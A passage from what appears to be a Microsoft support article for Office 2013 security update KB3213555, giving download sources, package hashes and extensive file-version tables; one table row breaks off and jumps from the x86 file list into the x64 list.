\n--- \n \n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB3213555>) website. \n--- \n \n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download the security update KB3213555 for the 32-bit version of Office 2013](<http://www.microsoft.com/download/details.aspx?familyid=d46a5a32-cd74-483c-846a-224328067a92>)\n * [Download the security update KB3213555 for the 64-bit version of Office 2013](<http://www.microsoft.com/download/details.aspx?familyid=4dd698e3-3c96-4b35-b926-aff47fff9934>) \n--- \n \n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: July 11, 2017](<https://support.microsoft.com/en-us/help/20170711>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [KB3203386](<http://support.microsoft.com/kb/3203386>).\n\n### File hash information\n\nPackage Name| Package Hash SHA 1| Package Hash SHA 2 \n---|---|--- \nmso2013-kb3213555-fullfile-x86-glb.exe| 5CC91F57A0D767B6451912E3B35F89FF0C7B5B9E| C5FC2C30251E4B43968488E19E37A2EE49F11ACD7362D69998966FAF7F8F178C \nmso2013-kb3213555-fullfile-x64-glb.exe| 6148662532C5F32B68B8DDDA2AFCC76ED69C6BA0| 3A9ABC30225DB1AE43A0CD1B7459E6710363B9B833A6FBB1AD7A3DE28726DA13 \n \n### File information\n\nThe English version of this security update has the file attributes (or later file attributes) that are listed in the following table. The dates and the times for these files are listed in Coordinated Universal Time (UTC). 
The dates and the times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files. \nFor all supported x86-based versions of Office 2013| File identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nfirstrun.exe| firstrun.exe| 15.0.4927.1000| 998592| 25-Jun-17| 04:24 \nmsointl.dll.x86.1025| msointl.dll| 15.0.4903.1000| 4330240| 26-Jun-17| 08:22 \nmsointl.dll.x86.1026| msointl.dll| 15.0.4903.1000| 3243256| 26-Jun-17| 08:22 \nmsointl.dll.x86.1027| msointl.dll| 15.0.4897.1000| 3237120| 26-Jun-17| 08:22 \nmsointl.dll.x86.1029| msointl.dll| 15.0.4903.1000| 3238144| 26-Jun-17| 08:22 \nmsointl.dll.x86.1030| msointl.dll| 15.0.4945.1000| 3024128| 26-Jun-17| 08:22 \nmsointl.dll.x86.1031| msointl.dll| 15.0.4903.1000| 3183864| 26-Jun-17| 08:22 \nmsointl.dll.x86.1032| msointl.dll| 15.0.4903.1000| 3605752| 26-Jun-17| 08:22 \nmsointl.dll.x86.3082| msointl.dll| 15.0.4903.1000| 3212536| 26-Jun-17| 08:22 \nmsointl.dll.x86.1061| msointl.dll| 15.0.4903.1000| 3001080| 26-Jun-17| 08:22 \nmsointl.dll.x86.1069| msointl.dll| 15.0.4897.1000| 3093240| 26-Jun-17| 08:22 \nmsointl.dll.x86.1035| msointl.dll| 15.0.4945.1000| 3016448| 26-Jun-17| 08:22 \nmsointl.dll.x86.1036| msointl.dll| 15.0.4903.1000| 3871496| 26-Jun-17| 08:22 \nmsointl.dll.x86.1110| msointl.dll| 15.0.4897.1000| 3152128| 26-Jun-17| 08:22 \nmsointl.dll.x86.1095| msointl.dll| 15.0.4897.1000| 3019512| 26-Jun-17| 08:22 \nmsointl.dll.x86.1037| msointl.dll| 15.0.4903.1000| 4118216| 26-Jun-17| 08:22 \nmsointl.dll.x86.1081| msointl.dll| 15.0.4903.1000| 3093240| 26-Jun-17| 08:22 \nmsointl.dll.x86.1050| msointl.dll| 15.0.4903.1000| 3103992| 26-Jun-17| 08:22 \nmsointl.dll.x86.1038| msointl.dll| 15.0.4903.1000| 3294464| 26-Jun-17| 08:22 \nmsointl.dll.x86.1057| msointl.dll| 15.0.4903.1000| 2812672| 26-Jun-17| 08:22 \nmsointl.dll.x86.1040| 
msointl.dll| 15.0.4903.1000| 3130624| 26-Jun-17| 08:22 \nmsointl.dll.x86.1041| msointl.dll| 15.0.4903.1000| 3093248| 26-Jun-17| 08:22 \nmsointl.dll.x86.1087| msointl.dll| 15.0.4903.1000| 3288832| 26-Jun-17| 08:22 \nmsointl.dll.x86.1099| msointl.dll| 15.0.4897.1000| 3162880| 26-Jun-17| 08:22 \nmsointl.dll.x86.1042| msointl.dll| 15.0.4937.1000| 3764480| 26-Jun-17| 08:22 \nmsointl.dll.x86.1063| msointl.dll| 15.0.4903.1000| 3245304| 26-Jun-17| 08:22 \nmsointl.dll.x86.1062| msointl.dll| 15.0.4903.1000| 3211512| 26-Jun-17| 08:22 \nmsointl.dll.x86.1086| msointl.dll| 15.0.4903.1000| 2831616| 26-Jun-17| 08:22 \nmsointl.dll.x86.1044| msointl.dll| 15.0.4903.1000| 2938112| 26-Jun-17| 08:22 \nmsointl.dll.x86.1043| msointl.dll| 15.0.4903.1000| 3098880| 26-Jun-17| 08:22 \nmsointl.dll.x86.1045| msointl.dll| 15.0.4903.1000| 3326200| 26-Jun-17| 08:22 \nmsointl.dll.x86.1046| msointl.dll| 15.0.4903.1000| 3131136| 26-Jun-17| 08:22 \nmsointl.dll.x86.2070| msointl.dll| 15.0.4903.1000| 3155704| 26-Jun-17| 08:22 \nmsointl.dll.x86.1048| msointl.dll| 15.0.4903.1000| 3270912| 26-Jun-17| 08:22 \nmsointl.dll.x86.1049| msointl.dll| 15.0.4903.1000| 3285760| 26-Jun-17| 08:22 \nmsointl.dll.x86.1051| msointl.dll| 15.0.4903.1000| 3285752| 26-Jun-17| 08:22 \nmsointl.dll.x86.1060| msointl.dll| 15.0.4903.1000| 3099392| 26-Jun-17| 08:22 \nmsointl.dll.x86.2074| msointl.dll| 15.0.4945.1000| 3141376| 26-Jun-17| 08:22 \nmsointl.dll.x86.1053| msointl.dll| 15.0.4945.1000| 2985720| 26-Jun-17| 08:22 \nmsointl.dll.x86.1054| msointl.dll| 15.0.4903.1000| 2932992| 26-Jun-17| 08:22 \nmsointl.dll.x86.1055| msointl.dll| 15.0.4903.1000| 3155192| 26-Jun-17| 08:22 \nmsointl.dll.x86.1058| msointl.dll| 15.0.4903.1000| 3265784| 26-Jun-17| 08:22 \nmsointl.dll.x86.1066| msointl.dll| 15.0.4903.1000| 3275000| 26-Jun-17| 08:22 \nmsointl.dll.x86.2052| msointl.dll| 15.0.4903.1000| 3110088| 26-Jun-17| 08:22 \nmsointl.dll.x86.1028| msointl.dll| 15.0.4903.1000| 3182784| 26-Jun-17| 08:22 \nmsointl.dll.x86.1033| msointl.dll| 
15.0.4897.1000| 3819264| 25-Jun-17| 04:24 \nacmcompanion.mso.dll| mso.dll| 15.0.4945.1001| 26942720| | \nmso.dll.x86| mso.dll| 15.0.4945.1001| 26942720| 25-Jun-17| 04:24 \nmsores.dll| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:24 \nmsores.dll.x86| msores.dll| 15.0.4913.1000| 133647104| 25-Jun-17| 04:27 \nacmserver.office.dll| office.dll| 15.0.4945.1001| 466640| 25-Jun-17| 04:24 \ndcfoffice.dll| office.dll| 15.0.4945.1001| 466640| 25-Jun-17| 04:24 \ndcfoffice.dll.x86| office.dll| 15.0.4945.1001| 466640| 25-Jun-17| 04:24 \noffice.dll| office.dll| 15.0.4945.1001| 466640| 25-Jun-17| 04:24 \nmsosqm.exe| msosqm.exe| 15.0.4919.1000| 559336| 25-Jun-17| 04:24 \nmsointl.rest.idx_dll.x86.1025| msointl.rest.idx_dll| 15.0.4859.1000| 1499848| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1026| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1026| msointl.rest.idx_dll| 15.0.4859.1000| 1503424| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1027| msointl.dll.idx_dll| 15.0.4442.1000| 52848| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1027| msointl.rest.idx_dll| 15.0.4853.1000| 1476800| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1029| msointl.dll.idx_dll| 15.0.4454.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1029| msointl.rest.idx_dll| 15.0.4859.1000| 1468608| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1030| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1030| msointl.rest.idx_dll| 15.0.4945.1000| 1464520| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1031| msointl.rest.idx_dll| 15.0.4859.1000| 1470656| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1032| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1032| msointl.rest.idx_dll| 15.0.4859.1000| 1476288| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1033| msointl.rest.idx_dll| 15.0.4853.1000| 1493760| 25-Jun-17| 04:24 \nmsointl.rest.idx_dll.x86.3082| msointl.rest.idx_dll| 15.0.4859.1000| 1479360| 
26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1061| msointl.dll.idx_dll| 15.0.4463.1000| 52816| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1061| msointl.rest.idx_dll| 15.0.4859.1000| 1475264| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1069| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1069| msointl.rest.idx_dll| 15.0.4853.1000| 1476800| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1035| msointl.dll.idx_dll| 15.0.4445.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1035| msointl.rest.idx_dll| 15.0.4945.1000| 1465032| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1036| msointl.rest.idx_dll| 15.0.4885.1000| 1476800| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1110| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1110| msointl.rest.idx_dll| 15.0.4853.1000| 1480384| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1095| msointl.dll.idx_dll| 15.0.4527.1000| 52392| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1095| msointl.rest.idx_dll| 15.0.4853.1000| 1488072| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1037| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1081| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1081| msointl.rest.idx_dll| 15.0.4859.1000| 1499328| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1050| msointl.dll.idx_dll| 15.0.4460.1000| 53328| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1050| msointl.rest.idx_dll| 15.0.4859.1000| 1508040| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1038| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1038| msointl.rest.idx_dll| 15.0.4859.1000| 1462984| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1057| msointl.dll.idx_dll| 15.0.4469.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1057| msointl.rest.idx_dll| 15.0.4859.1000| 1493184| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1040| msointl.rest.idx_dll| 15.0.4859.1000| 
1454272| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1041| msointl.rest.idx_dll| 15.0.4859.1000| 1486024| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1087| msointl.dll.idx_dll| 15.0.4460.1000| 52288| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1087| msointl.rest.idx_dll| 15.0.4859.1000| 1472704| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1099| msointl.dll.idx_dll| 15.0.4487.1000| 52816| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1099| msointl.rest.idx_dll| 15.0.4853.1000| 1510592| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1042| msointl.rest.idx_dll| 15.0.4937.1000| 1436360| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1063| msointl.dll.idx_dll| 15.0.4463.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1063| msointl.rest.idx_dll| 15.0.4859.1000| 1493696| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1062| msointl.dll.idx_dll| 15.0.4463.1000| 53328| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1062| msointl.rest.idx_dll| 15.0.4859.1000| 1495744| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1086| msointl.dll.idx_dll| 15.0.4469.1000| 52288| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1086| msointl.rest.idx_dll| 15.0.4859.1000| 1492680| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1044| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1044| msointl.rest.idx_dll| 15.0.4859.1000| 1460936| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1043| msointl.rest.idx_dll| 15.0.4859.1000| 1467072| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1045| msointl.dll.idx_dll| 15.0.4442.1000| 52848| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1045| msointl.rest.idx_dll| 15.0.4859.1000| 1482944| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1046| msointl.rest.idx_dll| 15.0.4859.1000| 1510088| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.2070| msointl.dll.idx_dll| 15.0.4569.1501| 52904| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.2070| msointl.rest.idx_dll| 15.0.4859.1000| 1514688| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1048| msointl.dll.idx_dll| 
15.0.4448.1000| 52816| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1048| msointl.rest.idx_dll| 15.0.4859.1000| 1476808| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1049| msointl.rest.idx_dll| 15.0.4885.1000| 1469120| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1051| msointl.dll.idx_dll| 15.0.4885.1000| 62656| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1051| msointl.rest.idx_dll| 15.0.4859.1000| 1482944| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1060| msointl.dll.idx_dll| 15.0.4466.1000| 52816| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1060| msointl.rest.idx_dll| 15.0.4859.1000| 1484488| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.2074| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.2074| msointl.rest.idx_dll| 15.0.4945.1000| 1501376| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1053| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1053| msointl.rest.idx_dll| 15.0.4945.1000| 1461952| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1054| msointl.dll.idx_dll| 15.0.4448.1000| 52288| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1054| msointl.rest.idx_dll| 15.0.4893.1000| 1450176| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1055| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1055| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1058| msointl.dll.idx_dll| 15.0.4454.1000| 53312| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1058| msointl.rest.idx_dll| 15.0.4859.1000| 1486016| 26-Jun-17| 08:22 \nmsointl.dll.idx_dll.x86.1066| msointl.dll.idx_dll| 15.0.4481.1000| 52800| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1066| msointl.rest.idx_dll| 15.0.4859.1000| 1525448| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.2052| msointl.rest.idx_dll| 15.0.4859.1000| 1464512| 26-Jun-17| 08:22 \nmsointl.rest.idx_dll.x86.1028| msointl.rest.idx_dll| 15.0.4859.1000| 1448128| 26-Jun-17| 08:22 \nfirstrun.veman.xml| 
firstrun.visualelementsmanifest.xml| | 344| 25-Jun-17| 04:24 \nexcellogo.contrastblack_scale100.png| excellogo.contrast-black_scale-100.png| | 1657| 25-Jun-17| 04:24 \nexcellogo.contrastblack_scale140.png| excellogo.contrast-black_scale-140.png| | 2571| 25-Jun-17| 04:24 \nexcellogo.contrastblack_scale180.png| excellogo.contrast-black_scale-180.png| | 3253| 25-Jun-17| 04:24 \nexcellogo.contrastblack_scale80.png| excellogo.contrast-black_scale-80.png| | 1288| 25-Jun-17| 04:24 \nexcellogo.contrastwhite_scale100.png| excellogo.contrast-white_scale-100.png| | 1649| 25-Jun-17| 04:24 \nexcellogo.contrastwhite_scale140.png| excellogo.contrast-white_scale-140.png| | 2556| 25-Jun-17| 04:24 \nexcellogo.contrastwhite_scale180.png| excellogo.contrast-white_scale-180.png| | 3290| 25-Jun-17| 04:24 \nexcellogo.contrastwhite_scale80.png| excellogo.contrast-white_scale-80.png| | 1303| 25-Jun-17| 04:24 \nexcellogo.scale100.png| excellogo.scale-100.png| | 1706| 25-Jun-17| 04:24 \nexcellogo.scale140.png| excellogo.scale-140.png| | 2511| 25-Jun-17| 04:24 \nexcellogo.scale180.png| excellogo.scale-180.png| | 3120| 25-Jun-17| 04:24 \nexcellogo.scale80.png| excellogo.scale-80.png| | 1402| 25-Jun-17| 04:24 \nexcellogosmall.contrastblack_scale100.png| excellogosmall.contrast-black_scale-100.png| | 1085| 25-Jun-17| 04:24 \nexcellogosmall.contrastblack_scale140.png| excellogosmall.contrast-black_scale-140.png| | 1339| 25-Jun-17| 04:24 \nexcellogosmall.contrastblack_scale180.png| excellogosmall.contrast-black_scale-180.png| | 2028| 25-Jun-17| 04:24 \nexcellogosmall.contrastblack_scale80.png| excellogosmall.contrast-black_scale-80.png| | 811| 25-Jun-17| 04:24 \nexcellogosmall.contrastwhite_scale100.png| excellogosmall.contrast-white_scale-100.png| | 1053| 25-Jun-17| 04:24 \nexcellogosmall.contrastwhite_scale140.png| excellogosmall.contrast-white_scale-140.png| | 1315| 25-Jun-17| 04:24 \nexcellogosmall.contrastwhite_scale180.png| excellogosmall.contrast-white_scale-180.png| | 1927| 25-Jun-17| 
04:24 \nexcellogosmall.contrastwhite_scale80.png| excellogosmall.contrast-white_scale-80.png| | 772| 25-Jun-17| 04:24 \nexcellogosmall.scale100.png| excellogosmall.scale-100.png| | 1208| 25-Jun-17| 04:24 \nexcellogosmall.scale140.png| excellogosmall.scale-140.png| | 1454| 25-Jun-17| 04:24 \nexcellogosmall.scale180.png| excellogosmall.scale-180.png| | 2015| 25-Jun-17| 04:24 \nexcellogosmall.scale80.png| excellogosmall.scale-80.png| | 886| 25-Jun-17| 04:24 \nfirstrunlogo.contrastblack_scale100.png| firstrunlogo.contrast-black_scale-100.png| | 1125| 25-Jun-17| 04:24 \nfirstrunlogo.contrastblack_scale140.png| firstrunlogo.contrast-black_scale-140.png| | 1689| 25-Jun-17| 04:24 \nfirstrunlogo.contrastblack_scale180.png| firstrunlogo.contrast-black_scale-180.png| | 2181| 25-Jun-17| 04:24 \nfirstrunlogo.contrastblack_scale80.png| firstrunlogo.contrast-black_scale-80.png| | 850| 25-Jun-17| 04:24 \nfirstrunlogo.contrastwhite_scale100.png| firstrunlogo.contrast-white_scale-100.png| | 1196| 25-Jun-17| 04:24 \nfirstrunlogo.contrastwhite_scale140.png| firstrunlogo.contrast-white_scale-140.png| | 1817| 25-Jun-17| 04:24 \nfirstrunlogo.contrastwhite_scale180.png| firstrunlogo.contrast-white_scale-180.png| | 2352| 25-Jun-17| 04:24 \nfirstrunlogo.contrastwhite_scale80.png| firstrunlogo.contrast-white_scale-80.png| | 901| 25-Jun-17| 04:24 \nfirstrunlogo.scale100.png| firstrunlogo.scale-100.png| | 15557| 25-Jun-17| 04:24 \nfirstrunlogo.scale140.png| firstrunlogo.scale-140.png| | 16184| 25-Jun-17| 04:24 \nfirstrunlogo.scale180.png| firstrunlogo.scale-180.png| | 16534| 25-Jun-17| 04:24 \nfirstrunlogo.scale80.png| firstrunlogo.scale-80.png| | 15298| 25-Jun-17| 04:24 \nfirstrunlogosmall.contrastblack_scale100.png| firstrunlogosmall.contrast-black_scale-100.png| | 682| 25-Jun-17| 04:24 \nfirstrunlogosmall.contrastblack_scale140.png| firstrunlogosmall.contrast-black_scale-140.png| | 932| 25-Jun-17| 04:24 \nfirstrunlogosmall.contrastblack_scale180.png| 
52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1061| msointl.rest.idx_dll| 15.0.4859.1000| 1475264| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1035| msointl.dll.idx_dll| 15.0.4445.1000| 52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1035| msointl.rest.idx_dll| 15.0.4945.1000| 1465032| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1036| msointl.rest.idx_dll| 15.0.4885.1000| 1476800| 26-Jun-17| 08:26 \nmsointl.rest.idx_dll.x64.1037| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1081| msointl.dll.idx_dll| 15.0.4442.1000| 52352| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1081| msointl.rest.idx_dll| 15.0.4859.1000| 1499328| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1050| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1050| msointl.rest.idx_dll| 15.0.4859.1000| 1508032| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1038| msointl.dll.idx_dll| 15.0.4448.1000| 52816| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1038| msointl.rest.idx_dll| 15.0.4859.1000| 1462976| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1057| msointl.dll.idx_dll| 15.0.4469.1000| 52816| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1057| msointl.rest.idx_dll| 15.0.4859.1000| 1493192| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1040| msointl.rest.idx_dll| 15.0.4859.1000| 1454272| 26-Jun-17| 08:26 \nmsointl.rest.idx_dll.x64.1041| msointl.rest.idx_dll| 15.0.4859.1000| 1486016| 26-Jun-17| 08:26 \nmsointl.dll.idx_dll.x64.1087| msointl.dll.idx_dll| 15.0.4460.1000| 52288| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1087| msointl.rest.idx_dll| 15.0.4859.1000| 1472712| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1042| msointl.rest.idx_dll| 15.0.4937.1000| 1436360| 26-Jun-17| 08:26 \nmsointl.dll.idx_dll.x64.1063| msointl.dll.idx_dll| 15.0.4463.1000| 52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1063| msointl.rest.idx_dll| 15.0.4859.1000| 1493704| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1062| msointl.dll.idx_dll| 
15.0.4463.1000| 53312| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1062| msointl.rest.idx_dll| 15.0.4859.1000| 1495752| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1086| msointl.dll.idx_dll| 15.0.4469.1000| 52288| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1086| msointl.rest.idx_dll| 15.0.4859.1000| 1492672| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1044| msointl.dll.idx_dll| 15.0.4442.1000| 52336| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1044| msointl.rest.idx_dll| 15.0.4859.1000| 1460928| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1043| msointl.rest.idx_dll| 15.0.4859.1000| 1467072| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1045| msointl.dll.idx_dll| 15.0.4442.1000| 52848| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1045| msointl.rest.idx_dll| 15.0.4859.1000| 1482944| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1046| msointl.rest.idx_dll| 15.0.4859.1000| 1510080| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.2070| msointl.dll.idx_dll| 15.0.4569.1501| 52904| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.2070| msointl.rest.idx_dll| 15.0.4859.1000| 1514696| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1048| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1048| msointl.rest.idx_dll| 15.0.4859.1000| 1476800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1049| msointl.rest.idx_dll| 15.0.4885.1000| 1469120| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1051| msointl.dll.idx_dll| 15.0.4885.1000| 62656| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1051| msointl.rest.idx_dll| 15.0.4859.1000| 1482944| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1060| msointl.dll.idx_dll| 15.0.4466.1000| 52816| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1060| msointl.rest.idx_dll| 15.0.4859.1000| 1484488| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.2074| msointl.dll.idx_dll| 15.0.4460.1000| 53312| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.2074| msointl.rest.idx_dll| 15.0.4945.1000| 1501384| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1053| 
msointl.dll.idx_dll| 15.0.4442.1000| 52336| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1053| msointl.rest.idx_dll| 15.0.4945.1000| 1461960| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1054| msointl.dll.idx_dll| 15.0.4448.1000| 52304| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1054| msointl.rest.idx_dll| 15.0.4893.1000| 1450176| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1055| msointl.dll.idx_dll| 15.0.4448.1000| 52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1055| msointl.rest.idx_dll| 15.0.4859.1000| 1483968| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1058| msointl.dll.idx_dll| 15.0.4454.1000| 53312| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1058| msointl.rest.idx_dll| 15.0.4859.1000| 1486016| 26-Jun-17| 08:27 \nmsointl.dll.idx_dll.x64.1066| msointl.dll.idx_dll| 15.0.4481.1000| 52800| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.1066| msointl.rest.idx_dll| 15.0.4859.1000| 1525448| 26-Jun-17| 08:27 \nmsointl.rest.idx_dll.x64.2052| msointl.rest.idx_dll| 15.0.4859.1000| 1464512| 26-Jun-17| 08:26 \nmsointl.rest.idx_dll.x64.1028| msointl.rest.idx_dll| 15.0.4859.1000| 1448136| 26-Jun-17| 08:26 \nfirstrun.veman.xml| firstrun.visualelementsmanifest.xml| | 344| 25-Jun-17| 04:24 \nexcellogo.contrastblack_scale100.png| excellogo.contrast-black_scale-100.png| | 1657| 25-Jun-17| 04:24 \nexcellogo.contrastblack_scale140.png| excellogo.contrast-black_scale-140.png| | 2571| 25-Jun-17| 04:24 \nexcellogo.contrastblack_scale180.png| excellogo.contrast-black_scale-180.png| | 3253| 25-Jun-17| 04:24 \nexcellogo.contrastblack_scale80.png| excellogo.contrast-black_scale-80.png| | 1288| 25-Jun-17| 04:24 \nexcellogo.contrastwhite_scale100.png| excellogo.contrast-white_scale-100.png| | 1649| 25-Jun-17| 04:24 \nexcellogo.contrastwhite_scale140.png| excellogo.contrast-white_scale-140.png| | 2556| 25-Jun-17| 04:24 \nexcellogo.contrastwhite_scale180.png| excellogo.contrast-white_scale-180.png| | 3290| 25-Jun-17| 04:24 \nexcellogo.contrastwhite_scale80.png| 
